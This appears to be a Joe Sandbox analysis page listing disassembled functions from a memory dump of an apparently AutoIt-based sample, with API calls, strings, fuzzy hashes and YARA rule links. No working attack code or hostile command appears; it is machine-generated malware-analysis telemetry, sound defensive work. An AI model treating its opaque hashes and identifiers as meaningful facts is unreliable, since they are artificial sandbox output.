Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5fcf0532c0bbb2f6cf43b48534513597ecc8ae83c85c66d41ba2ad48b5eb4dbe
Instruction ID: 373b6b249552c8884cbb2cce30bb4c1a2075151aee552910cc90f8edcbde1855
Opcode Fuzzy Hash: 5fcf0532c0bbb2f6cf43b48534513597ecc8ae83c85c66d41ba2ad48b5eb4dbe
Instruction Fuzzy Hash: 0AF01D32641158BBE7619BD29C0DEEF7A7CEFC6B21F000269FA0591050E7A41A1687B5

Function 00A577EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A577FE
EnterCriticalSection.KERNEL32(?,?,009FC2B6,?,?), ref: 00A5780F
TerminateThread.KERNEL32(00000000,000001F6,?,009FC2B6,?,?), ref: 00A5781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,009FC2B6,?,?), ref: 00A57829

Part of subcall function 00A571F0: CloseHandle.KERNEL32(00000000,?,00A57836,?,009FC2B6,?,?), ref: 00A571FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00A5783C
LeaveCriticalSection.KERNEL32(?,?,009FC2B6,?,?), ref: 00A57843

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: d9b15752b0d3a9ceb8e2720cdc9a90e1e4135ad6438a3cf38e44beac426518a9
Instruction ID: 1157945ad8838de377ad2e8e2b8122a309488aeeefb1ea861917e82ad8deece1
Opcode Fuzzy Hash: d9b15752b0d3a9ceb8e2720cdc9a90e1e4135ad6438a3cf38e44beac426518a9
Instruction Fuzzy Hash: 3EF08C32145612ABD7916BA4FC8CEEF7B3AFF49312F140521F603A50A0EBF5580ACB60

Function 00A4954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A49555
UnloadUserProfile.USERENV(?,?), ref: 00A49561
CloseHandle.KERNEL32(?), ref: 00A4956A
CloseHandle.KERNEL32(?), ref: 00A49572
GetProcessHeap.KERNEL32(00000000,?), ref: 00A4957B
HeapFree.KERNEL32(00000000), ref: 00A49582

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 45d92a416169efe6a1d45c9fadf519d9bd42d43fef1774d22c39d5f69217374c
Instruction ID: 6a34c44f2f78932d87ddd889d955999ff1ff891586e8dfca1dbd510502791623
Opcode Fuzzy Hash: 45d92a416169efe6a1d45c9fadf519d9bd42d43fef1774d22c39d5f69217374c
Instruction Fuzzy Hash: 55E0E536004601BBDB819FE1EC0CD5ABF39FF49722B104220F225C5074CB32A46ADB50

Function 00A68CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A68CFD
CharUpperBuffW.USER32(?,?), ref: 00A68E0C
VariantClear.OLEAUT32(?), ref: 00A68F84

Part of subcall function 00A57B1D: VariantInit.OLEAUT32(00000000), ref: 00A57B5D
Part of subcall function 00A57B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00A57B66
Part of subcall function 00A57B1D: VariantClear.OLEAUT32(00000000), ref: 00A57B72

Strings

AUTOIT.ERROR, xrefs: 00A68E12
Incorrect Parameter format, xrefs: 00A68D35, 00A68EF7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f46919bb6d5eb2c15e941c84b6fc254447944bf135159f6e4ecbc3ecd9d2dc0a
Instruction ID: 582c3e23eed4256b5612909c51e647181b154314eb91ec3bbb8984dba124247b
Opcode Fuzzy Hash: f46919bb6d5eb2c15e941c84b6fc254447944bf135159f6e4ecbc3ecd9d2dc0a
Instruction Fuzzy Hash: B6917C706083059FC710DF24C58096ABBF9EFD9354F148A6EF98A8B3A1DB31E905CB52

Function 00A5323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0436A: _wcscpy.LIBCMT ref: 00A0438D

_memset.LIBCMT ref: 00A5332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A5335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A53410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A5343E

Strings

0, xrefs: 00A5331A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 23423c59a42c8e3713eadd1204e71a50e431935cc86d64b16c1676ebbfc54769
Instruction ID: 56761848f24ea986a8f44177e6a1b63ada2e78a87211f57647e22538fb4cc78f
Opcode Fuzzy Hash: 23423c59a42c8e3713eadd1204e71a50e431935cc86d64b16c1676ebbfc54769
Instruction Fuzzy Hash: B551D132608300ABDB169F68D9456AFB7E8BFD53A2F044A2DFC91971D1DB70CA48C752

Function 00A52EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A52F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A52F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00A52FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AB7890,00000000), ref: 00A53012

Strings

0, xrefs: 00A52F5C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: fb84f4061464d71cf068e744405af8efba3b3e20a2d922a82e41ebafbea4bf6d
Instruction ID: a808a16362bec939c95a3e0aa480533e878e7ec5d850c55ba6ee3940dca96398
Opcode Fuzzy Hash: fb84f4061464d71cf068e744405af8efba3b3e20a2d922a82e41ebafbea4bf6d
Instruction Fuzzy Hash: C641B2322043419FDB24DF24D885B5ABBE4BF85351F10461DF965972D1D770EA09CB62

Function 00A6DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A6DEAE

Part of subcall function 00A01462: _memmove.LIBCMT ref: 00A014B0

Strings

winapi, xrefs: 00A6DF1F
none, xrefs: 00A6DF89
stdcall, xrefs: 00A6DF30
cdecl, xrefs: 00A6DF05

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: c1ac14d6c27f652f9676ed9686c4c319c4013a07b3b0cb5de94f44872e98e4f1
Instruction ID: 8a4e3a8af25714a1e8f869980c5bbbb164ae1386c6bc5107903327cfa164962c
Opcode Fuzzy Hash: c1ac14d6c27f652f9676ed9686c4c319c4013a07b3b0cb5de94f44872e98e4f1
Instruction Fuzzy Hash: B931A270A00219AFCF10EF94DE819EEB3B4FF55354B108A29F866972D1DB71A945CB80

Function 00A49A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A49ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A49ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A49B0F

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Strings

ListBox, xrefs: 00A49A8B
ComboBox, xrefs: 00A49A56

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 409a92112720a0dea7102c44a528da3330a34956725ce5e1e7971d3138f28cb8
Instruction ID: 9bb5f6b12f8070788e616f9a5b22204b53c5280b213afb54b3291223fe603c1f
Opcode Fuzzy Hash: 409a92112720a0dea7102c44a528da3330a34956725ce5e1e7971d3138f28cb8
Instruction Fuzzy Hash: 7F210575A01108BEDB24EBA4ED8ACFFB7BCDF95360F104119F825972D1DB34496A9620

Function 00A76A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 009F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009F214F
Part of subcall function 009F2111: GetStockObject.GDI32(00000011), ref: 009F2163
Part of subcall function 009F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A76A86
LoadLibraryW.KERNEL32(?), ref: 00A76A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A76AA2
DestroyWindow.USER32(?), ref: 00A76AAA

Strings

SysAnimate32, xrefs: 00A76A61

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: fa7e54c66a6b7802bbdb2e7f9be32b44cdc08f5969281fe00b6c4dc78fb34442
Instruction ID: 8e2f11cf72f65f56bdfc00d687067adb67f9c943133a302e8e2c9224eb6586df
Opcode Fuzzy Hash: fa7e54c66a6b7802bbdb2e7f9be32b44cdc08f5969281fe00b6c4dc78fb34442
Instruction Fuzzy Hash: 25218871200A05AFEF108FA49C80FBB77BDEB593A4F50C629FA58A2190D3719C919B60

Function 00A57357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A57377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A573AA
GetStdHandle.KERNEL32(0000000C), ref: 00A573BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A573F6

Strings

nul, xrefs: 00A573F1

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: ba2c802dcea59f3cd3ca6543adc9645d414e2aed3a5a413a3dc6c42694ec6ed5
Instruction ID: 34145f381d8736a1068d4c57058bd99ec6c1e6888b78f6d23180ca7486d9031c
Opcode Fuzzy Hash: ba2c802dcea59f3cd3ca6543adc9645d414e2aed3a5a413a3dc6c42694ec6ed5
Instruction Fuzzy Hash: 40219174504206ABDB208F65EC08A9E7BA4BF54731F204A19FCA0EB2D0E770D859DB50

Function 00A57425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A57444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A57476
GetStdHandle.KERNEL32(000000F6), ref: 00A57487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A574C1

Strings

nul, xrefs: 00A574BC

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7e80a516a745ed6860bd0dfcc581cad16810510cdf8a5752c9fff1a17d930d55
Instruction ID: 69fb0d6c2a375d992d1c44f22f5e16fbd0091bd2758a2eb1c505c05730c5ac5b
Opcode Fuzzy Hash: 7e80a516a745ed6860bd0dfcc581cad16810510cdf8a5752c9fff1a17d930d55
Instruction Fuzzy Hash: 1F21A1315082059BDB209F68AC48E9D7BB8BF55721F200B09FDA0E72D0D7709849C760

Function 00A5B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A5B2EB
__swprintf.LIBCMT ref: 00A5B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00A80980), ref: 00A5B342

Strings

%lu, xrefs: 00A5B2FE

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: ea822e336148cf549d2bcc0a3f554468856e3e2158ab6eac2987a05194a58611
Instruction ID: 613881b4c8a69d7b52f4f2ba6b614d6a8407123fce036860e9f912bded3a093c
Opcode Fuzzy Hash: ea822e336148cf549d2bcc0a3f554468856e3e2158ab6eac2987a05194a58611
Instruction Fuzzy Hash: 12217435600108AFCB10DFA5CD85DEEB7B8FF89714B104069F905E7252DB71EA45CB61

Function 00A4AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Part of subcall function 00A4AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A4AA6F
Part of subcall function 00A4AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4AA82
Part of subcall function 00A4AA52: GetCurrentThreadId.KERNEL32 ref: 00A4AA89
Part of subcall function 00A4AA52: AttachThreadInput.USER32(00000000), ref: 00A4AA90

GetFocus.USER32 ref: 00A4AC2A

Part of subcall function 00A4AA9B: GetParent.USER32(?), ref: 00A4AAA9

GetClassNameW.USER32(?,?,00000100), ref: 00A4AC73
EnumChildWindows.USER32(?,00A4ACEB), ref: 00A4AC9B
__swprintf.LIBCMT ref: 00A4ACB5

Strings

%s%d, xrefs: 00A4ACAF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: d94d571640bb87fa3db1082590166880cc1ccad2a76472efbeeae6920bb1a606
Instruction ID: 8c1cdda14bbb75cac5ba651a46bb6d05478b0e7c24f24d023fca94bdfd5b7c31
Opcode Fuzzy Hash: d94d571640bb87fa3db1082590166880cc1ccad2a76472efbeeae6920bb1a606
Instruction Fuzzy Hash: 9511B179640209BBDF51BFA0DE85FEA376CAFA4710F008075FE08AA182DB705959DB71

Function 00A522E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A52318

Strings

APPEND, xrefs: 00A52351
REMOVE, xrefs: 00A5231E
EXISTS, xrefs: 00A52340
KEYS, xrefs: 00A5232F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: f2481b6da774f015ee73a91c560dd2d99957a7345eaa8bee0c1eec59de01f049
Instruction ID: 892ba32fec3835f570618bcc0bf9c4723d45034d53d3f644b31be2a6c374bb4e
Opcode Fuzzy Hash: f2481b6da774f015ee73a91c560dd2d99957a7345eaa8bee0c1eec59de01f049
Instruction Fuzzy Hash: 14115E3091011C9FCF00EF94D9519FEB7B4FF26344B504569D81467292EB766D4ACF50

Function 00A6F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A6F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A6F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A6F453
CloseHandle.KERNEL32(?), ref: 00A6F4D4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: f34bf767237d16d40945ea7c5f38a28674ad0ed6260786bfa17a7e7f3afa3863
Instruction ID: 5b62c9ecba9bc6abb81d43f17c72deca01aec9229e446d67a492a8620d9ab1f2
Opcode Fuzzy Hash: f34bf767237d16d40945ea7c5f38a28674ad0ed6260786bfa17a7e7f3afa3863
Instruction Fuzzy Hash: 668150716047009FD720EF28D896F6BB7E5AF84710F14892DFA999B2D2DB70AC418F91

Function 00A70697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7040D,?,?), ref: 00A71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A707E3
RegCloseKey.ADVAPI32(?,?), ref: 00A7080F
RegCloseKey.ADVAPI32(00000000), ref: 00A7081C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 39960f3e5ed1c7dbcc4d1c421dce5909b1667a9063a5f89a297c4f4cfdbb62e9
Instruction ID: 10e3d33ff2c623a04d3514c63c0e4f825a7cb6b1f64c03f2c325558d96ddb039
Opcode Fuzzy Hash: 39960f3e5ed1c7dbcc4d1c421dce5909b1667a9063a5f89a297c4f4cfdbb62e9
Instruction Fuzzy Hash: BB513A71208208AFD714EF64CD81F6AB7F9BF84704F04891DF599972A2DB30E905CB92

Function 00A5EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A5EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A5EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A5ECCA

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A5ECEF
